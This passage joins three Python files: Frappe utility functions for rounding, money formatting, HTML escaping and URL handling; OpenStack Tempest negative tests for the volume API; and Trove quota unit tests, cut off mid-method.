except Exception:
num = 0
return num
def cint(s):
"""Convert to integer"""
try: num = int(float(s))
except Exception: num = 0
return num
def cstr(s):
if isinstance(s, unicode):
return s
elif s is None:
return ''
elif isinstance(s, basestring):
return unicode(s, 'utf-8')
else:
return unicode(s)
def rounded(num, precision=0):
"""round method for round halfs to nearest even algorithm aka banker's rounding - compatible with python3"""
precision = cint(precision)
multiplier = 10 ** precision
# avoid rounding errors
num = round(num * multiplier if precision else num, 8)
floor = math.floor(num)
decimal_part = num - floor
if not precision and decimal_part == 0.5:
num = floor if (floor % 2 == 0) else floor + 1
else:
num = round(num)
return (num / multiplier) if precision else num
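# Illustrative: with the default precision of 0, halves go to the nearest even
# integer, e.g. rounded(0.5) -> 0, rounded(1.5) -> 2, rounded(2.5) -> 2.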
def remainder(numerator, denominator, precision=2):
precision = cint(precision)
multiplier = 10 ** precision
if precision:
_remainder = ((numerator * multiplier) % (denominator * multiplier)) / multiplier
else:
_remainder = numerator % denominator
return flt(_remainder, precision)
def round_based_on_smallest_currency_fraction(value, currency, precision=2):
smallest_currency_fraction_value = flt(frappe.db.get_value("Currency",
currency, "smallest_currency_fraction_value"))
if smallest_currency_fraction_value:
remainder_val = remainder(value, smallest_currency_fraction_value, precision)
if remainder_val > (smallest_currency_fraction_value / 2):
value += smallest_currency_fraction_value - remainder_val
else:
value -= remainder_val
else:
value = rounded(value)
return flt(value, precision)
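# Illustrative (ignoring floating-point representation noise): with a
# smallest_currency_fraction_value of 0.05, 101.98 rounds up to 102.00 while
# 101.97 rounds down to 101.95.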
def encode(obj, encoding="utf-8"):
if isinstance(obj, list):
out = []
for o in obj:
if isinstance(o, unicode):
out.append(o.encode(encoding))
else:
out.append(o)
return out
elif isinstance(obj, unicode):
return obj.encode(encoding)
else:
return obj
def parse_val(v):
"""Converts to simple datatypes from SQL query results"""
if isinstance(v, (datetime.date, datetime.datetime)):
v = unicode(v)
elif isinstance(v, datetime.timedelta):
v = ":".join(unicode(v).split(":")[:2])
elif isinstance(v, long):
v = int(v)
return v
def fmt_money(amount, precision=None, currency=None):
"""
Convert to string with commas for thousands, millions etc
"""
number_format = None
if currency:
number_format = frappe.db.get_value("Currency", currency, "number_format", cache=True)
if not number_format:
number_format = frappe.db.get_default("number_format") or "#,###.##"
decimal_str, comma_str, number_format_precision = get_number_format_info(number_format)
if precision is None:
precision = number_format_precision
amount = '%.*f' % (precision, flt(amount))
if amount.find('.') == -1:
decimals = ''
else:
decimals = amount.split('.')[1]
parts = []
minus = ''
if flt(amount) < 0:
minus = '-'
amount = cstr(abs(flt(amount))).split('.')[0]
if len(amount) > 3:
parts.append(amount[-3:])
amount = amount[:-3]
val = 2 if number_format == "#,##,###.##" else 3
while len(amount) > val:
parts.append(amount[-val:])
amount = amount[:-val]
parts.append(amount)
parts.reverse()
amount = comma_str.join(parts) + ((precision and decimal_str) and (decimal_str + decimals) or "")
amount = minus + amount
if currency and frappe.defaults.get_global_default("hide_currency_symbol") != "Yes":
symbol = frappe.db.get_value("Currency", currency, "symbol") or currency
amount = symbol + " " + amount
return amount
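# Illustrative (assuming the default number_format "#,###.##"):
#   fmt_money(123456.789) -> '123,456.79'
# With the Indian format "#,##,###.##" the same value groups as '1,23,456.79'.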
number_format_info = {
"#,###.##": (".", ",", 2),
"#.###,##": (",", ".", 2),
"# ###.##": (".", " ", 2),
"# ###,##": (",", " ", 2),
"#'###.##": (".", "'", 2),
"#, ###.##": (".", ", ", 2),
"#,##,###.##": (".", ",", 2),
"#,###.###": (".", ",", 3),
"#.###": ("", ".", 0),
"#,###": ("", ",", 0)
}
def get_number_format_info(format):
return number_format_info.get(format) or (".", ",", 2)
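# Each tuple above is (decimal separator, group separator, precision), e.g.
# get_number_format_info("#.###,##") -> (",", ".", 2).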
#
# convert currency to words
#
def money_in_words(number, main_currency = None, fraction_currency=None):
"""
Returns string in words with currency and fraction currency.
"""
from frappe.utils import get_defaults
_ = frappe._
if not number or flt(number) < 0:
return ""
d = get_defaults()
if not main_currency:
main_currency = d.get('currency', 'INR')
if not fraction_currency:
fraction_currency = frappe.db.get_value("Currency", main_currency, "fraction") or _("Cent")
n = "%.2f" % flt(number)
main, fraction = n.split('.')
if len(fraction)==1: fraction += '0'
number_format = frappe.db.get_value("Currency", main_currency, "number_format", cache=True) or \
frappe.db.get_default("number_format") or "#,###.##"
in_million = True
if number_format == "#,##,###.##": in_million = False
out = main_currency + ' ' + in_words(main, in_million).title()
if cint(fraction):
out = out + ' ' + _('and') + ' ' + in_words(fraction, in_million).title() + ' ' + fraction_currency
return out + ' ' + _('only.')
#
# convert number to words
#
def in_words(integer, in_million=True):
"""
Returns string in words for the given integer.
"""
locale = 'en_IN' if not in_million else frappe.local.lang
integer = int(integer)
try:
ret = num2words(integer, lang=locale)
except NotImplementedError:
ret = num2words(integer, lang='en')
return ret.replace('-', ' ')
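# Illustrative: in_words(42) -> 'forty two' (hyphens are replaced by spaces);
# in_words(100000, in_million=False) uses the en_IN locale and gives 'one lakh'.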
def is_html(text):
out = False
for key in ["<br>", "<p", "<img", "<div"]:
if key in text:
out = True
break
return out
# from Jinja2 code
_striptags_re = re.compile(r'(<!--.*?-->|<[^>]*>)')
def strip_html(text):
"""removes anything enclosed in and including <>"""
return _striptags_re.sub("", text)
def escape_html(text):
html_escape_table = {
"&": "&amp;",
'"': "&quot;",
"'": "&apos;",
">": "&gt;",
"<": "&lt;",
}
return "".join(html_escape_table.get(c,c) for c in text)
def pretty_date(iso_datetime):
"""
Takes an ISO time and returns a string representing how
long ago the date represents.
Ported from PrettyDate by John Resig
"""
if not iso_datetime: return ''
import math
if isinstance(iso_datetime, basestring):
iso_datetime = datetime.datetime.strptime(iso_datetime, DATETIME_FORMAT)
now_dt = datetime.datetime.strptime(now(), DATETIME_FORMAT)
dt_diff = now_dt - iso_datetime
# available only in python 2.7+
# dt_diff_seconds = dt_diff.total_seconds()
dt_diff_seconds = dt_diff.days * 86400.0 + dt_diff.seconds
dt_diff_days = math.floor(dt_diff_seconds / 86400.0)
# different cases
if dt_diff_seconds < 60.0:
return 'just now'
elif dt_diff_seconds < 120.0:
return '1 minute ago'
elif dt_diff_seconds < 3600.0:
return '%s minutes ago' % cint(math.floor(dt_diff_seconds / 60.0))
elif dt_diff_seconds < 7200.0:
return '1 hour ago'
elif dt_diff_seconds < 86400.0:
return '%s hours ago' % cint(math.floor(dt_diff_seconds / 3600.0))
elif dt_diff_days == 1.0:
return 'Yesterday'
elif dt_diff_days < 7.0:
return '%s days ago' % cint(dt_diff_days)
elif dt_diff_days < 31.0:
return '%s week(s) ago' % cint(math.ceil(dt_diff_days / 7.0))
elif dt_diff_days < 365.0:
return '%s months ago' % cint(math.ceil(dt_diff_days / 30.0))
else:
return 'more than %s year(s) ago' % cint(math.floor(dt_diff_days / 365.0))
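# Illustrative: a timestamp 90 seconds old gives '1 minute ago', 45 minutes old
# gives '45 minutes ago', 3 days old gives '3 days ago', and 10 days old gives
# '2 week(s) ago'.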
def comma_or(some_list):
return comma_sep(some_list, frappe._("{0} or {1}"))
def comma_and(some_list):
return comma_sep(some_list, frappe._("{0} and {1}"))
def comma_sep(some_list, pattern):
if isinstance(some_list, (list, tuple)):
# list(some_list) is done to preserve the existing list
some_list = [unicode(s) for s in list(some_list)]
if not some_list:
return ""
elif len(some_list) == 1:
return some_list[0]
else:
some_list = ["'%s'" % s for s in some_list]
return pattern.format(", ".join(frappe._(s) for s in some_list[:-1]), some_list[-1])
else:
return some_list
def new_line_sep(some_list):
if isinstance(some_list, (list, tuple)):
# list(some_list) is done to preserve the existing list
some_list = [unicode(s) for s in list(some_list)]
if not some_list:
return ""
elif len(some_list) == 1:
return some_list[0]
else:
some_list = ["%s" % s for s in some_list]
return format("\n ".join(some_list))
else:
return some_list
def filter_strip_join(some_list, sep):
"""given a list, filter None values, strip spaces and join"""
return (cstr(sep)).join((cstr(a).strip() for a in filter(None, some_list)))
def get_url(uri=None, full_address=False):
"""get app url from request"""
host_name = frappe.local.conf.host_name
if uri and (uri.startswith("http://") or uri.startswith("https://")):
return uri
if not host_name:
if hasattr(frappe.local, "request") and frappe.local.request and frappe.local.request.host:
protocol = 'https' == frappe.get_request_header('X-Forwarded-Proto', "") and 'https://' or 'http://'
host_name = protocol + frappe.local.request.host
elif frappe.local.site:
host_name = "http://{}".format(frappe.local.site)
else:
host_name = frappe.db.get_value("Website Settings", "Website Settings",
"subdomain")
if host_name and "http" not in host_name:
host_name = "http://" + host_name
if not host_name:
host_name = "http://localhost"
if not uri and full_address:
uri = frappe.get_request_header("REQUEST_URI", "")
url = urllib.basejoin(host_name, uri) if uri else host_name
return url
def get_host_name():
return get_url().rsplit("//", 1)[-1]
def get_link_to_form(doctype, name, label=None):
if not label: label = name
return """<a href="{0}">{1}</a>""".format(get_url_to_form(doctype, name), label)
def get_url_to_form(doctype, name):
return get_url(uri = "desk#Form/{0}/{1}".format(quoted(doctype), quoted(name)))
def get_url_to_list(doctype):
return get_url(uri = "desk#List/{0}".format(quoted(doctype)))
operator_map = {
# startswith
"^": lambda (a, b): (a or "").startswith(b),
# in or not in a list
"in": lambda (a, b): operator.contains(b, a),
"not in": lambda (a, b): not operator.contains(b, a),
# comparison operators
"=": lambda (a, b): operator.eq(a, b),
"!=": lambda (a, b): operator.ne(a, b),
">": lambda (a, b): operator.gt(a, b),
"<": lambda (a, b): operator.lt(a, b),
">=": lambda (a, b): operator.ge(a, b),
"<=": lambda (a, b): operator.le(a, b),
"not None": lambda (a, b): a and True or False,
"None": lambda (a, b): (not a) and True or False
}
def compare(val1, condition, val2):
ret = False
if condition in operator_map:
ret = operator_map[condition]((val1, val2))
return ret
def scrub_urls(html):
html = expand_relative_urls(html)
# encoding should be responsibility of the composer
# html = quote_urls(html)
return html
def expand_relative_urls(html):
# expand relative urls
url = get_url()
if url.endswith("/"): url = url[:-1]
def _expand_relative_urls(match):
to_expand = list(match.groups())
if not to_expand[2].startswith("/"):
to_expand[2] = "/" + to_expand[2]
to_expand.insert(2, url)
return "".join(to_expand)
return re.sub('(href|src){1}([\s]*=[\s]*[\'"]?)((?!http)[^\'" >]+)([\'"]?)', _expand_relative_urls, html)
def quoted(url):
return cstr(urllib.quote(encode(url), safe=b"~@#$&()*!+=:;,.?/'"))
def quote_urls(html):
def _quote_url(match):
groups = list(match.groups())
groups[2] = quoted(groups[2])
return "".join(groups)
return re.sub('(href|src){1}([\s]*=[\s]*[\'"]?)((?:http)[^\'">]+)([\'"]?)',
_quote_url, html)
def unique(seq):
"""use this instead of list(set()) to preserve order of the original list.
Thanks to Stackoverflow: http://stackoverflow.com/questions/480214/how-do-you-remove-duplicates-from-a-list-in-python-whilst-preserving-order"""
seen = set()
seen_add = seen.add
return [ x for x in seq if not (x in seen or seen_add(x)) ]
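# Illustrative: unique([3, 1, 3, 2, 1]) -> [3, 1, 2], unlike list(set(...)),
# which does not preserve the original order.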
def strip(val, chars=None):
# \ufeff is a zero-width no-break space (BOM), \u200b is a zero-width space
return (val or "").replace("\ufeff", "").replace("\u200b", "").strip(chars)
def to_markdown(html):
text = None
try:
text = html2text(html)
except HTMLParser.HTMLParseError:
pass
return text
|
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from tempest.api.volume import base
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesNegativeTest(base.BaseVolumeTest):
@classmethod
def resource_setup(cls):
super(VolumesNegativeTest, cls).resource_setup()
# Create a test shared instance and volume for attach/detach tests
cls.volume = cls.create_volume()
cls.mountpoint = "/dev/vdc"
def create_image(self):
# Create image
image_name = data_utils.rand_name(self.__class__.__name__ + "-image")
image = self.images_client.create_image(
name=image_name,
container_format=CONF.image.container_formats[0],
disk_format=CONF.image.disk_formats[0],
visibility='private',
min_disk=CONF.volume.volume_size + 1)
self.addCleanup(test_utils.call_and_ignore_notfound_exc,
self.images_client.delete_image, image['id'])
# Upload image with 1KB data
image_file = six.BytesIO(data_utils.random_bytes())
self.images_client.store_image_file(image['id'], image_file)
waiters.wait_for_image_status(self.images_client,
image['id'], 'active')
return image
@decorators.attr(type=['negative'])
@decorators.idempotent_id('f131c586-9448-44a4-a8b0-54ca838aa43e')
def test_volume_get_nonexistent_volume_id(self):
# Should not be able to get a non-existent volume
self.assertRaises(lib_exc.NotFound, self.volumes_client.show_volume,
data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('555efa6e-efcd-44ef-8a3b-4a7ca4837a29')
def test_volume_delete_nonexistent_volume_id(self):
# Should not be able to delete a non-existent Volume
self.assertRaises(lib_exc.NotFound, self.volumes_client.delete_volume,
data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('1ed83a8a-682d-4dfb-a30e-ee63ffd6c049')
def test_create_volume_with_invalid_size(self):
# Should not be able to create volume with invalid size in request
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume, size='#$%')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('9387686f-334f-4d31-a439-33494b9e2683')
def test_create_volume_without_passing_size(self):
# Should not be able to create volume without passing size
# in request
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume, size='')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('41331caa-eaf4-4001-869d-bc18c1869360')
def test_create_volume_with_size_zero(self):
# Should not be able to create volume with size zero
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume, size='0')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('8b472729-9eba-446e-a83b-916bdb34bef7')
def test_create_volume_with_size_negative(self):
# Should not be able to create volume with size negative
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume, size='-1')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('10254ed8-3849-454e-862e-3ab8e6aa01d2')
def test_create_volume_with_nonexistent_volume_type(self):
# Should not be able to create volume with non-existent volume type
self.assertRaises(lib_exc.NotFound, self.volumes_client.create_volume,
size='1', volume_type=data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('0c36f6ae-4604-4017-b0a9-34fdc63096f9')
def test_create_volume_with_nonexistent_snapshot_id(self):
# Should not be able to create volume with non-existent snapshot
self.assertRaises(lib_exc.NotFound, self.volumes_client.create_volume,
size='1', snapshot_id=data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('47c73e08-4be8-45bb-bfdf-0c4e79b88344')
def test_create_volume_with_nonexistent_source_volid(self):
# Should not be able to create volume with non-existent source volume
self.assertRaises(lib_exc.NotFound, self.volumes_client.create_volume,
size='1', source_volid=data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('0186422c-999a-480e-a026-6a665744c30c')
def test_update_volume_with_nonexistent_volume_id(self):
self.assertRaises(lib_exc.NotFound, self.volumes_client.update_volume,
volume_id=data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('e66e40d6-65e6-4e75-bdc7-636792fa152d')
def test_update_volume_with_invalid_volume_id(self):
self.assertRaises(lib_exc.NotFound, self.volumes_client.update_volume,
volume_id=data_utils.rand_name('invalid'))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('72aeca85-57a5-4c1f-9057-f320f9ea575b')
def test_update_volume_with_empty_volume_id(self):
self.assertRaises(lib_exc.NotFound, self.volumes_client.update_volume,
volume_id='')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('30799cfd-7ee4-446c-b66c-45b383ed211b')
def test_get_invalid_volume_id(self):
# Should not be able to get volume with invalid id
self.assertRaises(lib_exc.NotFound, self.volumes_client.show_volume,
data_utils.rand_name('invalid'))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('c6c3db06-29ad-4e91-beb0-2ab195fe49e3')
def test_get_volume_without_passing_volume_id(self):
# Should not be able to get volume when empty ID is passed
self.assertRaises(lib_exc.NotFound,
self.volumes_client.show_volume, '')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('1f035827-7c32-4019-9240-b4ec2dbd9dfd')
def test_delete_invalid_volume_id(self):
# Should not be able to delete volume when invalid ID is passed
self.assertRaises(lib_exc.NotFound, self.volumes_client.delete_volume,
data_utils.rand_name('invalid'))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('441a1550-5d44-4b30-af0f-a6d402f52026')
def test_delete_volume_without_passing_volume_id(self):
# Should not be able to delete volume when empty ID is passed
self.assertRaises(lib_exc.NotFound,
self.volumes_client.delete_volume, '')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('f5e56b0a-5d02-43c1-a2a7-c9b792c2e3f6')
@test.services('compute')
def test_attach_volumes_with_nonexistent_volume_id(self):
server = self.create_server()
self.assertRaises(lib_exc.NotFound,
self.volumes_client.attach_volume,
data_utils.rand_uuid(),
instance_uuid=server['id'],
mountpoint=self.mountpoint)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('9f9c24e4-011d-46b5-b992-952140ce237a')
def test_detach_volumes_with_invalid_volume_id(self):
self.assertRaises(lib_exc.NotFound,
self.volumes_client.detach_volume,
'xxx')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('e0c75c74-ee34-41a9-9288-2a2051452854')
def test_volume_extend_with_size_smaller_than_original_size(self):
# Extend volume with smaller size than original size.
extend_size = 0
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.extend_volume,
self.volume['id'], new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('5d0b480d-e833-439f-8a5a-96ad2ed6f22f')
def test_volume_extend_with_non_number_size(self):
# Extend volume when size is non number.
extend_size = 'abc'
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.extend_volume,
self.volume['id'], new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('355218f1-8991-400a-a6bb-971239287d92')
def test_volume_extend_with_None_size(self):
# Extend volume with None size.
extend_size = None
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.extend_volume,
self.volume['id'], new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('8f05a943-013c-4063-ac71-7baf561e82eb')
def test_volume_extend_with_nonexistent_volume_id(self):
# Extend volume size when volume is nonexistent.
extend_size = self.volume['size'] + 1
self.assertRaises(lib_exc.NotFound, self.volumes_client.extend_volume,
data_utils.rand_uuid(), new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('aff8ba64-6d6f-4f2e-bc33-41a08ee9f115')
def test_volume_extend_without_passing_volume_id(self):
# Extend volume size when passing volume id is None.
extend_size = self.volume['size'] + 1
self.assertRaises(lib_exc.NotFound, self.volumes_client.extend_volume,
None, new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('ac6084c0-0546-45f9-b284-38a367e0e0e2')
def test_reserve_volume_with_nonexistent_volume_id(self):
self.assertRaises(lib_exc.NotFound,
self.volumes_client.reserve_volume,
data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('eb467654-3dc1-4a72-9b46-47c29d22654c')
def test_unreserve_volume_with_nonexistent_volume_id(self):
self.assertRaises(lib_exc.NotFound,
self.volumes_client.unreserve_volume,
data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('449c4ed2-ecdd-47bb-98dc-072aeccf158c')
def test_reserve_volume_with_negative_volume_status(self):
# Mark volume as reserved.
self.volumes_client.reserve_volume(self.volume['id'])
        # Attempt to reserve a volume that is already reserved
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.reserve_volume,
self.volume['id'])
# Unmark volume as reserved.
self.volumes_client.unreserve_volume(self.volume['id'])
@decorators.attr(type=['negative'])
@decorators.idempotent_id('0f4aa809-8c7b-418f-8fb3-84c7a5dfc52f')
def test_list_volumes_with_nonexistent_name(self):
v_name = data_utils.rand_name(self.__class__.__name__ + '-Volume')
params = {'name': v_name}
fetched_volume = self.volumes_client.list_volumes(
params=params)['volumes']
self.assertEmpty(fetched_volume)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('9ca17820-a0e7-4cbd-a7fa-f4468735e359')
def test_list_volumes_detail_with_nonexistent_name(self):
v_name = data_utils.rand_name(self.__class__.__name__ + '-Volume')
params = {'name': v_name}
fetched_volume = \
self.volumes_client.list_volumes(
detail=True, params=params)['volumes']
self.assertEmpty(fetched_volume)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('143b279b-7522-466b-81be-34a87d564a7c')
def test_list_volumes_with_invalid_status(self):
params = {'status': 'null'}
fetched_volume = self.volumes_client.list_volumes(
params=params)['volumes']
self.assertEmpty(fetched_volume)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('ba94b27b-be3f-496c-a00e-0283b373fa75')
def test_list_volumes_detail_with_invalid_status(self):
params = {'status': 'null'}
fetched_volume = \
self.volumes_client.list_volumes(detail=True,
params=params)['volumes']
self.assertEmpty(fetched_volume)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('5b810c91-0ad1-47ce-aee8-615f789be78f')
@test.services('image')
def test_create_volume_from_image_with_decreasing_size(self):
# Create image
image = self.create_image()
        # Note(jeremyZ): To shorten the test time (uploading a large image is
        # time-consuming), only consider the scenario where the volume size is
        # smaller than the image's min_disk.
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume,
size=CONF.volume.volume_size,
imageRef=image['id'])
@decorators.attr(type=['negative'])
@decorators.idempotent_id('d15e7f35-2cfc-48c8-9418-c8223a89bcbb')
@test.services('image')
def test_create_volume_from_deactivated_image(self):
# Create image
image = self.create_image()
# Deactivate the image
self.images_client.deactivate_image(image['id'])
body = self.images_client.show_image(image['id'])
self.assertEqual("deactivated", body['status'])
# Try creating a volume from deactivated image
self.assertRaises(lib_exc.BadRequest,
self.create_volume,
imageRef=image['id'])
|
|
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mock import Mock, MagicMock, patch
from testtools import skipIf
from trove.common import cfg
from trove.common import exception
from trove.db.models import DatabaseModelBase
from trove.extensions.mgmt.quota.service import QuotaController
from trove.quota.models import Quota
from trove.quota.models import QuotaUsage
from trove.quota.models import Reservation
from trove.quota.models import Resource
from trove.quota.quota import DbQuotaDriver
from trove.quota.quota import QUOTAS
from trove.quota.quota import run_with_quotas
from trove.tests.unittests import trove_testtools
"""
Unit tests for the quota classes and functions in trove.quota.quota.
"""
CONF = cfg.CONF
resources = {
Resource.INSTANCES: Resource(Resource.INSTANCES,
'max_instances_per_tenant'),
Resource.VOLUMES: Resource(Resource.VOLUMES, 'max_volumes_per_tenant')
}
FAKE_TENANT1 = "123456"
FAKE_TENANT2 = "654321"
class Run_with_quotasTest(trove_testtools.TestCase):
def setUp(self):
super(Run_with_quotasTest, self).setUp()
self.quota_reserve_orig = QUOTAS.reserve
self.quota_rollback_orig = QUOTAS.rollback
self.quota_commit_orig = QUOTAS.commit
QUOTAS.reserve = Mock()
QUOTAS.rollback = Mock()
QUOTAS.commit = Mock()
def tearDown(self):
super(Run_with_quotasTest, self).tearDown()
QUOTAS.reserve = self.quota_reserve_orig
QUOTAS.rollback = self.quota_rollback_orig
QUOTAS.commit = self.quota_commit_orig
def test_run_with_quotas(self):
f = Mock()
run_with_quotas(FAKE_TENANT1, {'instances': 1, 'volumes': 5}, f)
self.assertTrue(QUOTAS.reserve.called)
self.assertTrue(QUOTAS.commit.called)
self.assertFalse(QUOTAS.rollback.called)
self.assertTrue(f.called)
def test_run_with_quotas_error(self):
f = Mock(side_effect=exception.TroveError())
self.assertRaises(exception.TroveError, run_with_quotas, FAKE_TENANT1,
{'instances': 1, 'volumes': 5}, f)
self.assertTrue(QUOTAS.reserve.called)
self.assertTrue(QUOTAS.rollback.called)
self.assertFalse(QUOTAS.commit.called)
self.assertTrue(f.called)
class QuotaControllerTest(trove_testtools.TestCase):
def setUp(self):
super(QuotaControllerTest, self).setUp()
context = MagicMock()
context.is_admin = True
req = MagicMock()
req.environ = MagicMock()
req.environ.get = MagicMock(return_value=context)
self.req = req
self.controller = QuotaController()
def tearDown(self):
super(QuotaControllerTest, self).tearDown()
def test_update_unknown_resource(self):
body = {'quotas': {'unknown_resource': 5}}
self.assertRaises(exception.QuotaResourceUnknown,
self.controller.update, self.req, body,
FAKE_TENANT1, FAKE_TENANT2)
def test_update_resource_no_value(self):
quota = MagicMock(spec=Quota)
with patch.object(DatabaseModelBase, 'find_by', return_value=quota):
body = {'quotas': {'instances': None}}
result = self.controller.update(self.req, body, FAKE_TENANT1,
FAKE_TENANT2)
self.assertEqual(0, quota.save.call_count)
self.assertEqual(200, result.status)
def test_update_resource_instance(self):
instance_quota = MagicMock(spec=Quota)
with patch.object(DatabaseModelBase, 'find_by',
return_value=instance_quota):
body = {'quotas': {'instances': 2}}
result = self.controller.update(self.req, body, FAKE_TENANT1,
FAKE_TENANT2)
self.assertEqual(1, instance_quota.save.call_count)
self.assertIn('instances', result._data['quotas'])
self.assertEqual(200, result.status)
self.assertEqual(2, result._data['quotas']['instances'])
@skipIf(not CONF.trove_volume_support, 'Volume support is not enabled')
def test_update_resource_volume(self):
instance_quota = MagicMock(spec=Quota)
volume_quota = MagicMock(spec=Quota)
def side_effect_func(*args, **kwargs):
return (instance_quota if kwargs['resource'] == 'instances'
else volume_quota)
with patch.object(DatabaseModelBase, 'find_by',
side_effect=side_effect_func):
body = {'quotas': {'instances': None, 'volumes': 10}}
result = self.controller.update(self.req, body, FAKE_TENANT1,
FAKE_TENANT2)
self.assertEqual(0, instance_quota.save.call_count)
self.assertNotIn('instances', result._data['quotas'])
self.assertEqual(1, volume_quota.save.call_count)
self.assertEqual(200, result.status)
self.assertEqual(10, result._data['quotas']['volumes'])
def test_update_resource_with_invalid_negative_number(self):
quota = MagicMock(spec=Quota)
with patch.object(DatabaseModelBase, 'find_by', return_value=quota):
body = {'quotas': {'instances': -2}}
self.assertRaises(exception.QuotaLimitTooSmall,
self.controller.update,
self.req, body, FAKE_TENANT1,
FAKE_TENANT2)
class DbQuotaDriverTest(trove_testtools.TestCase):
def setUp(self):
super(DbQuotaDriverTest, self).setUp()
self.driver = DbQuotaDriver(resources)
self.orig_Quota_find_all = Quota.find_all
self.orig_QuotaUsage_find_all = QuotaUsage.find_all
self.orig_QuotaUsage_find_by = QuotaUsage.find_by
self.orig_Reservation_create = Reservation.create
self.orig_QuotaUsage_create = QuotaUsage.create
self.orig_QuotaUsage_save = QuotaUsage.save
self.orig_Reservation_save = Reservation.save
self.mock_quota_result = Mock()
self.mock_usage_result = Mock()
Quota.find_all = Mock(return_value=self.mock_quota_result)
QuotaUsage.find_all = Mock(return_value=self.mock_usage_result)
def tearDown(self):
super(DbQuotaDriverTest, self).tearDown()
Quota.find_all = self.orig_Quota_find_all
QuotaUsage.find_all = self.orig_QuotaUsage_find_all
QuotaUsage.find_by = self.orig_QuotaUsage_find_by
Reservation.create = self.orig_Reservation_create
QuotaUsage.create = self.orig_QuotaUsage_create
QuotaUsage.save = self.orig_QuotaUsage_save
Reservation.save = self.orig_Reservation_save
def test_get_defaults(self):
defaults = self.driver.get_defaults(resources)
self.assertEqual(CONF.max_instances_per_tenant,
defaults[Resource.INSTANCES])
self.assertEqual(CONF.max_volumes_per_tenant,
defaults[Resource.VOLUMES])
def test_get_quota_by_tenant(self):
FAKE_QUOTAS = [Quota(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
hard_limit=12)]
self.mock_quota_result.all = Mock(return_value=FAKE_QUOTAS)
quota = self.driver.get_quota_by_tenant(FAKE_TENANT1,
Resource.VOLUMES)
self.assertEqual(FAKE_TENANT1, quota.tenant_id)
self.assertEqual(Resource.INSTANCES, quota.resource)
self.assertEqual(12, quota.hard_limit)
def test_get_quota_by_tenant_default(self):
self.mock_quota_result.all = Mock(return_value=[])
quota = self.driver.get_quota_by_tenant(FAKE_TENANT1,
Resource.VOLUMES)
self.assertEqual(FAKE_TENANT1, quota.tenant_id)
self.assertEqual(Resource.VOLUMES, quota.resource)
self.assertEqual(CONF.max_volumes_per_tenant, quota.hard_limit)
def test_get_all_quotas_by_tenant(self):
FAKE_QUOTAS = [Quota(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
hard_limit=22),
Quota(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
hard_limit=15)]
self.mock_quota_result.all = Mock(return_value=FAKE_QUOTAS)
quotas = self.driver.get_all_quotas_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, quotas[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
quotas[Resource.INSTANCES].resource)
self.assertEqual(22, quotas[Resource.INSTANCES].hard_limit)
self.assertEqual(FAKE_TENANT1, quotas[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, quotas[Resource.VOLUMES].resource)
self.assertEqual(15, quotas[Resource.VOLUMES].hard_limit)
def test_get_all_quotas_by_tenant_with_all_default(self):
